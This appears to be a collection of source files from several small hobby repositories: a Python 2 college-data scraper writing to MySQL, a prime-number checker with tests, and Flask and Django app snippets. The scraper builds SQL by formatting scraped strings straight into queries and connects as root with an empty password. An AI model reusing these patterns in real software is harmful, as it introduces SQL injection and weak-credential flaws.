except:\r\n collegeaddress.append(\"Address info not avaiable\")\r\n print \"No address given\"\r\n \r\n stuff1=innercontent3\r\n #finding the college phone number\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n phone=get_text(contactdetails1[0])\r\n phone=encode(phone)\r\n phone=removeNonAscii(phone)\r\n if phone:\r\n collegephone.append(phone)\r\n print phone\r\n else:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n \r\n except:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n\r\n stuff1=innercontent3\r\n #finding the e-mail id of college if it doesn't exist\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n email=get_text(contactdetails1[1])\r\n email=encode(email)\r\n email=removeNonAscii(email)\r\n if email:\r\n collegeemail.append(email)\r\n print email\r\n else:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n \r\n except:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n\r\n stuff1=innercontent3\r\n #finding the official college website\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n website=get_text(contactdetails1[2])\r\n website=encode(website)\r\n website=removeNonAscii(website)\r\n if website:\r\n collegewebsite.append(website)\r\n print website\r\n else:\r\n collegewebsite.append(\"Website info not available\")\r\n print \"Website info not available\"\r\n \r\n \r\n except:\r\n collegewebsite.append(\"Website info not available\")\r\n \"Website info not available\"\r\n\r\n stuff1=innercontent3\r\n \r\n #finding the college branches\r\n try:\r\n innercontent1 = stuff1.split('<th>STREAMS</th>')\r\n branches = innercontent1[1].split('</tbody>')\r\n branches1 = branches[0].split('<tr>')\r\n del branches1[0]\r\n branchlist1=[]\r\n for b in branches1:\r\n b=b.split('</td>')\r\n bname=get_text(b[0])\r\n bname=encode(bname)\r\n branchlist1.append(bname)\r\n #if branchlist:\r\n if bname not in branchlist:\r\n bid.append('B'+str(b1+1))#For branch id\r\n branchlist.append(bname)#for distinct branches\r\n b1=b1+1\r\n else:\r\n continue\r\n branchlistfinal.append(branchlist1) #print branchlist\r\n except Exception,e:\r\n branchlistfinal.append([\"Branch info not available\"])\r\n print str(e)+\"No branches specified[except]\"\r\n \r\n except Exception,e:\r\n collegecriteria.append(\"No criteria specified\")\r\n branchlistfinal.append([\"Branch info not available\"])\r\n collegewebsite.append(\"Website info not available\")\r\n collegeemail.append(\"Email info not available\")\r\n collegephone.append(\"Phone info not available\")\r\n collegeaddress.append(\"Address info not avaiable\")\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n collegetype.append(\"Not specified whether public or private\")\r\n print str(e)+m+\"can't be opened\"\r\n\r\n \r\n except Exception,e:\r\n collegecriteria.append(\"No criteria specified\")\r\n branchlistfinal.append([\"Branch info not available\"])\r\n collegewebsite.append(\"Website info not available\")\r\n collegeemail.append(\"Email info not available\")\r\n collegephone.append(\"Phone info not available\")\r\n collegeaddress.append(\"Address info not avaiable\")\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n collegetype.append(\"Not specified whether public or private\")\r\n \r\n #print \r\n print str(e)+\"No links found\"\r\n c1=c1+1\r\n \r\n except Exception,e:\r\n #total=0\r\n c=c-1\r\n print str(e)\r\n print \"Link Broken\"\r\n c=c+1\r\n\r\n else:\r\n #total=0\r\n print \"Link couldn't be open\"\r\n\r\n #logo\r\n #link\r\n #collegename\r\n #fees\r\n#print c \r\n#print branchlistfinal\r\n#print len(branchlistfinal)\r\ndb=MySQLdb.connect('127.0.0.1','root','','cdcolleges') \r\ncursor=db.cursor()\r\n\r\nlength=len(collegelogo)\r\nlength3=len(recruit)\r\nlength4=len(branchlist)\r\n\r\nprint length\r\n#loop for storing all the relevant college content along with distinct college id into it's desired table(collegelist)\r\ntry:\r\n for i in range(0,length):\r\n #collegename[i]=collegename[i].replace(\"'\",\"\")\r\n #collegename[i]=collegename[i].replace(\"0xe2\",\"\")\r\n #collegename[i]=collegename[i].replace(\"’\",\"\")\r\n #collegename[i]=collegename[i].replace(\",\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"'\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"0xe2\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"’\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\",\",\"\")\r\n sql='INSERT INTO `collegelist`(`CollegeId`,`CollegeName`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegename1[i],alias[i],collegewebsite[i],collegephone[i],collegeemail[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],collegesource[i])\r\n #sql1='INSERT INTO `collegelist1`(`CollegeId`,`CollegeName`,`DegreeOffered`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Branches`,`Recruiters`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegedegree[i],collegename1[i],alias[i],collegephone[i],collegeemail[i],collegewebsite[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],branchlistfinal[i],collegerecruiters[i],collegesource[i])\r\n print sql\r\n #print sql1\r\n #print(\"\\n\\nCollege specialization is:\"+collegespecialization[i]+\"\\nBranches:\"+str(branchlistfinal[i])+\"\\nCollege was established in:\"+collegeestd[i]+\"\\nCollege is:\"+collegetype[i]+\"\\nCollege logo is:\"+collegelogo[i]+\"\\nCollege name is:\"+collegename[i]+\"\\nCollege address is:\"+collegeaddress[i]+\"\\nCriteria for admission is:\"+collegecriteria[i]+\"\\nProcedure for admission is:\"+collegeprocedure[i]+\"\\nThe recruiters are:\"+str(collegerecruiters[i]))\r\n try:\r\n cursor.execute(sql)\r\n #cursor.execute(sql1)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"SQL error in collegelist insertion\"\r\n #print sql1\r\n#print recruit\r\n#print branchlist\r\ntry:\r\n for i in range(0,length):\r\n #collegename[i]=collegename[i].replace(\"'\",\"\")\r\n #collegename[i]=collegename[i].replace(\"0xe2\",\"\")\r\n #collegename[i]=collegename[i].replace(\"’\",\"\")\r\n #collegename[i]=collegename[i].replace(\",\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"'\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"0xe2\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\"’\",\"\")\r\n #collegename1[i]=collegename1[i].replace(\",\",\"\")\r\n #sql='INSERT INTO `collegelist`(`CollegeId`,`CollegeName`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegename1[i],alias[i],collegephone[i],collegeemail[i],collegewebsite[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],collegesource[i])\r\n sql1='INSERT INTO `collegelist1`(`CollegeId`,`CollegeName`,`DegreeOffered`,`CollegeKey`,`Alias`,`Website`,`Contact`,`Email`,`CollegeType`,`CollegeLogo`,`CourseFees`,`CollegeAddress`,`AdmissionCriteria`,`Branches`,`Recruiters`,`Source`) VALUES (\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")'%('CLG'+str(i+1),collegename[i],collegedegree[i],collegename1[i],alias[i],collegewebsite[i],collegephone[i],collegeemail[i],collegetype[i],str(collegelogo[i]),coursefees[i],collegeaddress[i],collegecriteria[i],branchlistfinal[i],collegerecruiters[i],collegesource[i])\r\n #print sql\r\n print sql1\r\n #print(\"\\n\\nCollege specialization is:\"+collegespecialization[i]+\"\\nBranches:\"+str(branchlistfinal[i])+\"\\nCollege was established in:\"+collegeestd[i]+\"\\nCollege is:\"+collegetype[i]+\"\\nCollege logo is:\"+collegelogo[i]+\"\\nCollege name is:\"+collegename[i]+\"\\nCollege address is:\"+collegeaddress[i]+\"\\nCriteria for admission is:\"+collegecriteria[i]+\"\\nProcedure for admission is:\"+collegeprocedure[i]+\"\\nThe recruiters are:\"+str(collegerecruiters[i]))\r\n try:\r\n #cursor.execute(sql)\r\n cursor.execute(sql1)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"SQL error in collegelist insertion\"\r\n\r\n#loop for entering recruiter list into it's desired table along with the recruiter id\r\ntry:\r\n for i in range(0,r1):\r\n recruit[i]=recruit[i].replace(\",\",\"\")\r\n recruit[i]=recruit[i].replace(\"'\",\"\")\r\n sql='INSERT INTO `recruiterlist`(`RecruiterId`, `RecruiterName`)VALUES(\"%s\",\"%s\")'%(rid[i],recruit[i])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"SQL error in inserting recruiters\"\r\n\r\n#loop for entering the branch list along with distinct branch id into it's desired table(branchlist) in the db\r\ntry:\r\n for i in range(0,b1):\r\n branchlist[i]=branchlist[i].replace(\",\",\"\")\r\n branchlist[i]=branchlist[i].replace(\"'\",\"\")\r\n sql='INSERT INTO `branchlist`(`BranchId`, `BranchName`)VALUES(\"%s\",\"%s\")'%(bid[i],branchlist[i])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Error inserting into branchlist table\"\r\n\r\n#loop for filling out the relational table(degree_college_branch_relation) between degreeid,collegeid,branchid\r\ntry:\r\n for i in range(0,length):\r\n #print (\"\\n\\n\\Degree Id:\"+did[i]+\"\\nDegree name:\"+degree[i])\r\n for j in range(0,length2):\r\n if(collegedegree[i]==degreelist[j]):\r\n for m in branchlistfinal[i]:\r\n #print m+\"\\n\"\r\n for n in range(0,b1):\r\n if(m==branchlist[n]):\r\n sql='INSERT INTO `degree_college_branch_relation`(`DegreeId`,`CollegeId`, `BranchId`)VALUES(\"%s\",\"%s\",\"%s\")'%(did[j],cid[i],bid[n])\r\n #print (\"\\nCollege id:\"+cid[i]+\"\\nRecruiter id:\"+rid[r])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\n #print(\"\\n\\nDegree Id:\"+did[i]+\"\\nColleg Id:\"+cid[k]+\"\\nBranch id:\"+bid[n])\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Err\"\r\n\r\n#loop for filling out the relational table between college id and recruiter id\r\ntry:\r\n for i in range(0,c1):\r\n #print (\"\\n\\nCollege Id:\"+cid[i]+\"\\nCollegename:\"+collegename[i])\r\n for m in collegerecruiters[i]:\r\n #print m\r\n #print collegerecruiters[i][m]\r\n for r in range(0,r1):\r\n #print r\r\n if(m==recruit[r]):\r\n sql='INSERT INTO `college_recruiter_relation`(`CollegeId`, `RecruiterId`)VALUES(\"%s\",\"%s\")'%(cid[i],rid[r])\r\n #print (\"\\nCollege id:\"+cid[i]+\"\\nRecruiter id:\"+rid[r])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Err1\"\r\n\r\n#loop for filling out the relation table(course_degree_college_relation) between courseid,degreeid and college id\r\ntry:\r\n for m in mapping:\r\n for i in range(0,c1):\r\n if(m[2]==collegedegree[i]):\r\n sql='INSERT INTO `course_degree_college_relation`(`CourseId`, `DegreeId`,`CollegeId`)VALUES(\"%s\",\"%s\",\"%s\")'%(m[0],m[1],cid[i])\r\n #print (\"\\nCollege id:\"+cid[i]+\"\\nRecruiter id:\"+rid[r])\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\nexcept Exception,e:\r\n print str(e)\r\n print \"Error\"\r\n \r\n \r\n #print(\"\\n\\nCourse Id:\"+m[0]+\"\\nDegree Id:\"+m[1]+\"\\nCollege Id:\"+cid[i])\r\n\r\n \r\ndb.close() #close the database connection\r\n" } ]
3
juanmsv/recycleDVHS
https://github.com/juanmsv/recycleDVHS
8bdfcf4008fc1fd1bd079f50a993b9f86700c63e
e373beef076c746f7f7ac4396106c5f95bfafa39
c8cd3f72484966068d6e224d903c4c8789ce5784
refs/heads/master
2020-09-23T10:54:32.859414
2020-02-24T23:16:41
2020-02-24T23:16:41
225,481,993
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6584699749946594, "alphanum_fraction": 0.7158470153808594, "avg_line_length": 37.52631759643555, "blob_id": "5a6f5207d9760657fe073f06a2e01221260bda40", "content_id": "f498993175bbbc6e8011af58bca210bf4dd9005c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 732, "license_type": "no_license", "max_line_length": 129, "num_lines": 19, "path": "/README.md", "repo_name": "juanmsv/recycleDVHS", "src_encoding": "UTF-8", "text": "# First Flask App\n\n## Instructions:\n\n1. Fork this repo by clicking the **Fork** button at the top right of the GitHub window.\n3. Open a new console and type `git clone https://github.com/code2collegeorg/first_flask_app.git`.\n4. Press _ENTER_. You'll see some text indicating that git is pulling down files from GitHub. It should look something like this:\n```\nCloning into 'first_flask_app'...\n 1 <html>\nremote: Enumerating objects: 11, done.\nremote: Counting objects: 100% (11/11), done.\n 1 <html>\nremote: Compressing objects: 100% (10/10), done.\nremote: Total 11 (delta 1), reused 10 (delta 0), pack-reused 0\nReceiving objects: 100% (11/11), done.\nResolving deltas: 100% (1/1), done.\n```\n5. If everything worked, you're all set!\n" }, { "alpha_fraction": 0.6657963395118713, "alphanum_fraction": 0.6657963395118713, "avg_line_length": 22.9375, "blob_id": "92ef81b62ef5f06d4d5a04e9fd39d60a7e93d88c", "content_id": "164b60bdf8e02d3f196a8f94cd60bac1b32cf48c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 49, "num_lines": 16, "path": "/flask_app.py", "repo_name": "juanmsv/recycleDVHS", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\[email protected]('/', methods=['GET'])\ndef main():\n return render_template('main.html')\n\[email protected]('/about', methods=['GET'])\ndef mission():\n return render_template('about.html')\n\[email protected]('/petition', methods=['GET'])\ndef petition():\n return render_template('petition.html')\n" } ]
2
ConCEAT/Prime_Numbers
https://github.com/ConCEAT/Prime_Numbers
da9025b55c38363afe689163d378b3a793ac3826
32d4967323a87512edf50a1caf78b8bba75a40f6
2b30e9263f896dfa8584b70ce4d317996a05cf14
refs/heads/master
2020-08-22T00:21:08.310954
2019-10-20T19:47:27
2019-10-24T16:05:20
216,279,626
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5603038668632507, "alphanum_fraction": 0.5735992193222046, "avg_line_length": 25.350000381469727, "blob_id": "84f6f519efc131311232dff6ce557fcc9d0cc94a", "content_id": "6e6503a4c29bfc1bfc330eb638f08fc803a3c87c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1053, "license_type": "no_license", "max_line_length": 64, "num_lines": 40, "path": "/source/Prime.py", "repo_name": "ConCEAT/Prime_Numbers", "src_encoding": "UTF-8", "text": "import math\n\ndef getNum(text):\n if type(text) != str: raise TypeError('text must be string')\n while True:\n try: num = int(input(text).strip())\n except ValueError: \n print (\"Integer needed.\")\n continue\n if num > 0: break\n print (\"Number must be positive.\")\n return num\n\ndef checkIfPrime(number):\n if type(number) != int: \n raise TypeError('number must be positive intiger')\n if number <= 0: \n raise ValueError('number must be positive intiger') \n if number < 4:\n return number != 1\n if number % 6 not in [1,5]: return False\n divisor = 5\n while divisor <= math.sqrt(number):\n if number % divisor == 0: return False\n while True:\n divisor+=1\n if divisor % 6 in [1,5]: break\n return True\n\ndef checkRange(start, end):\n return filter(checkIfPrime,range(start,end+1))\n\ndef Main():\n start = getNum(\"Start: \")\n end = getNum(\"End: \")\n print (*checkRange(start,end),sep='\\n')\n \n\nif __name__ == \"__main__\":\n\tMain()" }, { "alpha_fraction": 0.5698427557945251, "alphanum_fraction": 0.6022201776504517, "avg_line_length": 29.05555534362793, "blob_id": "ac8efa1b9b6e74333c40904f3374c819fb9fda25", "content_id": "0cf2be9c229413ce504dcb8c96a2a560488e7d2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 79, "num_lines": 36, "path": "/test/Prime_test.py", "repo_name": "ConCEAT/Prime_Numbers", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport unittest\n\nsys.path.insert(0,os.path.split(os.path.dirname(os.path.abspath(__file__)))[0])\nfrom source import Prime\n\nclass TestCheckIfPrime(unittest.TestCase):\n\n def test_primes(self):\n numbers = [2,3,5,11,19,101]\n for number in numbers:\n with self.subTest(case = number): \n self.assertTrue(Prime.checkIfPrime(number))\n\n def test_nonPrimes(self):\n numbers = [1,4,6,25,1000,18]\n for number in numbers:\n with self.subTest(case = number):\n self.assertFalse(Prime.checkIfPrime(number))\n\n def test_values(self):\n numbers = [0,-1,-121]\n for number in numbers:\n with self.subTest(case = number):\n self.assertRaises(ValueError,Prime.checkIfPrime,number)\n \n def test_types(self):\n numbers = [1.4,'4','four',2+5j,0.0,True,[]]\n for number in numbers:\n with self.subTest(case = number):\n self.assertRaises(TypeError,Prime.checkIfPrime,number)\n\n\nif __name__ == '__main__':\n unittest.main()" } ]
2
ChihChiu29/FireChat
https://github.com/ChihChiu29/FireChat
d084370ee88754dbb53b5801edc8f55d68752ccc
75353013367925fc8e6a170ba0d0c7e60deced16
0fa72880c7849ec2d6f03a5f5b2a56996e432986
refs/heads/master
2016-09-11T08:51:02.879704
2015-04-12T05:47:23
2015-04-12T05:47:23
29,353,997
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7964601516723633, "alphanum_fraction": 0.8053097128868103, "avg_line_length": 36.66666793823242, "blob_id": "ef1bde0d50cba9ea6f4efa92e43a29be5615337c", "content_id": "e7072dfe327a736629f566d8cadc0d62baca7e70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 113, "license_type": "no_license", "max_line_length": 54, "num_lines": 3, "path": "/app_engine/static/firechat-web/nbproject/project.properties", "repo_name": "ChihChiu29/FireChat", "src_encoding": "UTF-8", "text": "file.reference.static-firechat-web=.\nfiles.encoding=UTF-8\nsite.root.folder=${file.reference.static-firechat-web}\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.5994694828987122, "avg_line_length": 28, "blob_id": "ce4451a93a6fdc316d1505101378c6096d654039", "content_id": "1743894a0137ab63f8db1c733c470eb39b4ae707", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 377, "license_type": "no_license", "max_line_length": 78, "num_lines": 13, "path": "/app_engine/main.py", "repo_name": "ChihChiu29/FireChat", "src_encoding": "UTF-8", "text": "import webapp2\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n self.response.headers['Content-Type'] = 'text/html'\n self.response.write(\n '<h3>Welcome!</h3>'\n 'Please go '\n '<a href=\"/static/firechat-web/chat.html?key=\">here</a> instead.')\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n], debug=True)\n" } ]
2
bramuel/NLP-Django-v2
https://github.com/bramuel/NLP-Django-v2
794afe33b9fffa6fb67efc36918764f042a93a05
a7c596ee6db36a432acaffba5f02fdc7236ccd48
75ed305f8108f953b2823d7a9269ff62e4b7226f
refs/heads/master
2023-04-13T06:59:39.676354
2021-02-18T09:37:05
2021-02-18T09:37:05
339,998,157
0
0
null
2021-02-18T09:27:01
2021-02-18T09:41:33
2021-04-16T19:11:17
CSS
[ { "alpha_fraction": 0.5583756566047668, "alphanum_fraction": 0.5609136819839478, "avg_line_length": 19.263158798217773, "blob_id": "4dec853736788077bcededc14dea205512b7b5f2", "content_id": "9009f1663a0e322be4343a87115cfe9203fc1819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 394, "license_type": "no_license", "max_line_length": 75, "num_lines": 19, "path": "/r/r2/forms.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import PostQ\n\n\nfrom django.conf import settings\n\n\n\n \nclass QuoteForm(forms.ModelForm):\n class Meta:\n model=PostQ\n fields=('author','body')\n\n widgets={\n 'author':forms.Select(attrs={'class':'form-control'}),\n 'body':forms.Textarea(attrs={'class':'form-control','rows':2}),\n \n }\n\n " }, { "alpha_fraction": 0.5824345350265503, "alphanum_fraction": 0.6016949415206909, "avg_line_length": 35.05555725097656, "blob_id": "a4b9feea496de0531f3b7c0782e9062b9e4e0755", "content_id": "864e8bc52f688a5a94d1f08b8250e92ab273cb08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 123, "num_lines": 36, "path": "/r/r2/migrations/0002_auto_20200817_0559.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2 on 2020-08-17 12:59\n\nimport ckeditor.fields\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('r2', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PostQ',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('category', models.CharField(max_length=255)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('body', ckeditor.fields.RichTextField(blank=True, null=True)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ('likes', models.ManyToManyField(blank=True, null=True, related_name='blog', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AlterField(\n model_name='category',\n name='name',\n field=models.CharField(blank=True, max_length=255, null=True),\n ),\n migrations.DeleteModel(\n name='Post',\n ),\n ]\n" }, { "alpha_fraction": 0.6974637508392334, "alphanum_fraction": 0.6974637508392334, "avg_line_length": 31.352941513061523, "blob_id": "c0481b25ad99d87d9d116e9e6cb1bc161623ebeb", "content_id": "2e553b6a47ca3de1e478a3ed45e1246fe02abdc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/r/r2/urls.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom django.conf.urls import url\nfrom django.conf import settings \nfrom django.conf.urls.static import static \nfrom .views import QuoteView,AddQuoteView,QuoteCategoryView, Auth, display\n\n\n \nurlpatterns = [ \n \n url(r'^$',QuoteView.as_view(),name='quote-detail'),\n path('add_quote/',AddQuoteView.as_view(),name='add_quote'),\n path('quote_category/<str:cats>', QuoteCategoryView,name='quote_category'),\n path('meme_lord/<str:auth>',Auth ,name='meme_lord'),\n url(r'^results/$', display, name=\"disp\"),\n \n] \n\n" }, { "alpha_fraction": 0.5068870782852173, "alphanum_fraction": 0.5674931406974792, "avg_line_length": 19.16666603088379, "blob_id": "11a4e5ee41d0ae28c8a50839c08be080d29f2b5d", "content_id": "fe22c3ccba242b14c52f0fc7a644ae0feaeca01f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 51, "num_lines": 18, "path": "/r/r2/migrations/0005_auto_20200818_2040.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2 on 2020-08-19 03:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('r2', '0004_post'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='postq',\n name='body',\n field=models.CharField(max_length=255),\n ),\n ]\n" }, { "alpha_fraction": 0.8205128312110901, "alphanum_fraction": 0.8205128312110901, "avg_line_length": 28.25, "blob_id": "ad42f4fb3a87ef8d8eaa61862836afb8d837eecf", "content_id": "275d62410d394bdba3533246287296664d6da816", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/r/r2/admin.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Post,PostQ\nadmin.site.register(Post)\nadmin.site.register(PostQ)\n" }, { "alpha_fraction": 0.754601240158081, "alphanum_fraction": 0.754601240158081, "avg_line_length": 22.285715103149414, "blob_id": "00fe81da4baab24bf34bdab72807dfc526098fd1", "content_id": "dc41bbf49ecc473007448e215840e7c02461face", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 163, "license_type": "no_license", "max_line_length": 69, "num_lines": 7, "path": "/r/members/urls.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.urls import path,include\nfrom .views import UserRegisterView\n\nurlpatterns = [\n path('registration/',UserRegisterView.as_view(),name='register'),\n\n]\n" }, { "alpha_fraction": 0.5388813018798828, "alphanum_fraction": 0.5402455925941467, "avg_line_length": 24.275861740112305, "blob_id": "7d90b45b37c23f93cad0270015d3ae6a862a864e", "content_id": "6f9932c764d9c9e165d5f0879cb4302ba821dc38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 733, "license_type": "no_license", "max_line_length": 80, "num_lines": 29, "path": "/r/r2/serchx.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from .modules import *\n\nclass SearchView:\n def __init__(self,keyword,min_videos):\n self.keyword = keyword\n self.min_videos =min_videos\n\n\n \n\n\n\n def postl(self,*args, **kwargs):\n transcripts_url = \"data.csv\"\n if self.keyword and self.min_videos:\n min_videos = int(self.min_videos)\n\n dataframe = read_data(transcripts_url)\n video_ids = tf_idf(self.keyword, dataframe, 'body', self.min_videos)\n video_urls = []\n\n for vid in video_ids:\n url = dataframe.loc[vid, 'id']\n video_urls.append(url)\n\n context = { 'videos': video_urls }\n print(context )\n return video_urls\n return 0\n" }, { "alpha_fraction": 0.5836177468299866, "alphanum_fraction": 0.61774742603302, "avg_line_length": 18.53333282470703, "blob_id": "fccd159daf1a4733a081160ea287b5260f279b5c", "content_id": "c884b73c940ae43ef36c68926e1cf66a167095f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 49, "num_lines": 15, "path": "/r/r2/app.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "import uvicorn\nfrom fastapi import FastAPI\n\napp=FastAPI()\n\[email protected]('/')\ndef index():\n return {'message':'Hello stranger'}\n\[email protected]('/{name:str}')\ndef get_name(name:str):\n return {'message':f'Hello,{name} '}\n\nif __name__ == '__main__':\n uvicorn.run(app, host='127.0.0.1', port=8000)\n" }, { "alpha_fraction": 0.6006516814231873, "alphanum_fraction": 0.6068066358566284, "avg_line_length": 30.397727966308594, "blob_id": "7c4b63994e8914ceed78134cfa3b12f0805dd1e0", "content_id": "58100daacdb958865ffaf58080bd4067835110af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2762, "license_type": "no_license", "max_line_length": 102, "num_lines": 88, "path": "/r/r2/views.py", "repo_name": "bramuel/NLP-Django-v2", "src_encoding": "UTF-8", "text": "from django.shortcuts import render,get_object_or_404\nfrom .models import PostQ,Post\nfrom django.views.generic import ListView,DetailView,CreateView\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom .forms import QuoteForm\nfrom django.contrib.auth.models import User\n\nfrom .modules import 